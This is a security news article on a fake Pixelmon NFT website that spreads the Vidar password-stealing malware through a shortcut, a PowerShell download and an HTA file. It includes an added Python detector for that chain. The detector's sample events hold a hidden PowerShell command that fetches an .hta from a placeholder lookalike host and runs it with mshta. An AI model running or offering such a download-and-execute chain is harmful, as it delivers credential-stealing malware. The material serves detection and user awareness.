Scam Pixelmon NFT Website Hosts Password-stealing Malware
A fraudulent website mimicking popular Pixelmon NFT lures its visitors with promises of free collectibles and tokens only to have them download and install password-stealing malware.
Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.
In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.
However, instead of providing visitors with links to the game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. To be compromised, a user needs to download a malicious archive that packs a Windows shortcut and then open that shortcut.
Opening the Windows shortcut (setup.lnk) triggers the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file in turn retrieves the password-stealing malware Vidar, which has been spotted in similar attacks in the past.
Once running, Vidar connects to a Telegram channel to retrieve the IP address of its command-and-control (C2) server, then downloads additional configuration files and modules used to steal data from the compromised system. Vidar can search for relevant files on infected devices, exfiltrate them to an address defined by the threat actor, and steal passwords from apps and browsers.
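As an added example (not code from the article or from Bitdefender), the following Python detector checks constructed process-creation events for the chain described above: a PowerShell process fetching a .hta file over HTTP, and mshta.exe executing a .hta from a user-writable path under a PowerShell parent. The domain, paths and PIDs are placeholders, not indicators from the report, and the event format is an assumption.

```python
import re

# Constructed sample of process-creation events modelled on the chain above:
# explorer.exe (user opens setup.lnk) -> powershell.exe (downloads System32.hta)
# -> mshta.exe (executes the HTA). Names, PIDs and the domain are placeholders.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3001, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -c iwr https://pixelmon-lookalike.example/System32.hta -OutFile $env:TEMP\System32.hta"},
    {"pid": 4201, "ppid": 4188, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\victim\AppData\Local\Temp\System32.hta"},
    {"pid": 4300, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe notes.txt"},  # benign sibling, must not alert
]

# A .hta fetched over HTTP(S), and a .hta executed from a user-writable directory.
HTA_URL = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
USER_WRITABLE_HTA = re.compile(r'\\(Temp|AppData|Downloads)\\[^\s"]*\.hta\b', re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_hta_dropper_chain(events):
    """Return one alert dict per matched rule; parent lookup is by PID within the batch."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if name == "powershell.exe" and HTA_URL.search(e["cmd"]):
            alerts.append({"pid": e["pid"], "rule": "powershell_downloads_hta"})
        if name == "mshta.exe":
            if USER_WRITABLE_HTA.search(e["cmd"]):
                alerts.append({"pid": e["pid"], "rule": "mshta_runs_hta_from_user_path"})
            if parent and basename(parent["image"]) == "powershell.exe":
                alerts.append({"pid": e["pid"], "rule": "mshta_spawned_by_powershell"})
    return alerts


if __name__ == "__main__":
    for alert in detect_hta_dropper_chain(SAMPLE_EVENTS):
        print(alert)
```

Each rule fires on its own, so a single hit is worth triage even when the full chain is not visible in one log batch.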
This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. Because Pixelmon is an NFT site, the threat actors expect its visitors to have cryptocurrency wallets installed on their systems.
To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.